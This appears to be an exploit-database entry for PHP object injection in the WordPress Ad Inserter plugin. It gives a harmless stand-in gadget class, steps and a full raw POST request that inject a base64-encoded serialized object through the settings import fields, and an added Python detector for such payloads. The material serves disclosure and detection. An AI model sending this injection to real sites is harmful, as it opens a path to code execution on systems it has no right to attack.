## https://sploitus.com/exploit?id=WPEX-ID:C94B3A68-673B-44D7-9251-F3590CC5EE9E
To simulate a gadget chain, put the following code in a plugin:
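```php
// Stand-in for a real gadget: PHP calls __wakeup() automatically
// whenever unserialize() rebuilds an Evil object.
class Evil {
    public function __wakeup() : void {
        die("Arbitrary deserialization");
    }
}
```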
Activate the plugin, go to Settings > Ad Inserter, click the settings icon, and finally click "Save Settings". This makes a POST request.
Add "&import_block_0=1&export_settings_0=Tzo0OiJFdmlsIjowOnt9" to the body of that request. "Tzo0OiJFdmlsIjowOnt9" is the base64 encoding of O:4:"Evil":0:{}.
Then view the response to that request, which will contain the "Arbitrary deserialization" message.
---
```http
POST /wordpress/wp-admin/options-general.php?page=ad-inserter.php HTTP/1.1
Host: {host}
Content-Length: 887
Content-Type: application/x-www-form-urlencoded
Cookie: {cookie}

block-parameters-1=WyJhaV9zYXZlIl0%3D&block-parameters-2=WyJhaV9zYXZlIl0%3D&block-parameters-3=WyJhaV9zYXZlIl0%3D&block-parameters-4=WyJhaV9zYXZlIl0%3D&block-parameters-5=WyJhaV9zYXZlIl0%3D&block-parameters-6=WyJhaV9zYXZlIl0%3D&block-parameters-7=WyJhaV9zYXZlIl0%3D&block-parameters-8=WyJhaV9zYXZlIl0%3D&block-parameters-9=WyJhaV9zYXZlIl0%3D&block-parameters-10=WyJhaV9zYXZlIl0%3D&block-parameters-11=WyJhaV9zYXZlIl0%3D&block-parameters-12=WyJhaV9zYXZlIl0%3D&block-parameters-13=WyJhaV9zYXZlIl0%3D&block-parameters-14=WyJhaV9zYXZlIl0%3D&block-parameters-15=WyJhaV9zYXZlIl0%3D&block-parameters-16=WyJhaV9zYXZlIl0%3D&ai_save=Save+Settings&syntax-highlighter-theme=ad_inserter&plugin-usage-tracking=1&ai-active-tab=%5B0%2C0%5D&_wpnonce=48546fc1cb&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dad-inserter.php&import_block_0=1&export_settings_0=Tzo0OiJFdmlsIjowOnt9
```
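
For detection, the request above can be recognised by a form field whose value, raw or after base64 decoding, contains a PHP serialized object token. The following is an added example, not code from the original page or from the plugin; the function names are hypothetical and `SAMPLE_BODY` is a shortened, constructed copy of the request body shown above.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl

# PHP serialize() object tokens, O:<len>:"<Class>":<count>:{ (or C: for
# Serializable classes), at the start of the value or nested after ';' / '{'.
# Assumption: class names are ASCII; PHP also permits bytes 0x7f-0xff.
_PHP_OBJECT = re.compile(
    rb'(?:^|[;{])[OC]:\d+:"([A-Za-z_\\][A-Za-z0-9_\\]*)":\d+:\{'
)

# Constructed sample: a trimmed version of the POST body from the page.
SAMPLE_BODY = (
    "block-parameters-1=WyJhaV9zYXZlIl0%3D&ai_save=Save+Settings"
    "&_wpnonce=48546fc1cb&import_block_0=1"
    "&export_settings_0=Tzo0OiJFdmlsIjowOnt9"
)


def _b64_decode(value):
    """Return the decoded bytes, or None if value is not valid base64."""
    padded = value + "=" * (-len(value) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(padded, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def find_serialized_objects(body):
    """Return [(field, class_name), ...] for form fields carrying PHP objects."""
    hits = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        candidates = [value.encode("utf-8", "replace")]  # raw form value
        decoded = _b64_decode(value)
        if decoded is not None:
            candidates.append(decoded)                   # base64 layer
        for blob in candidates:
            for match in _PHP_OBJECT.finditer(blob):
                hits.append((name, match.group(1).decode("ascii")))
    return hits


if __name__ == "__main__":
    for field, cls in find_serialized_objects(SAMPLE_BODY):
        print(f"serialized PHP object of class {cls!r} in field {field!r}")
```

The benign `block-parameters-N` values decode to a JSON array (`["ai_save"]`), so only `export_settings_0` is flagged.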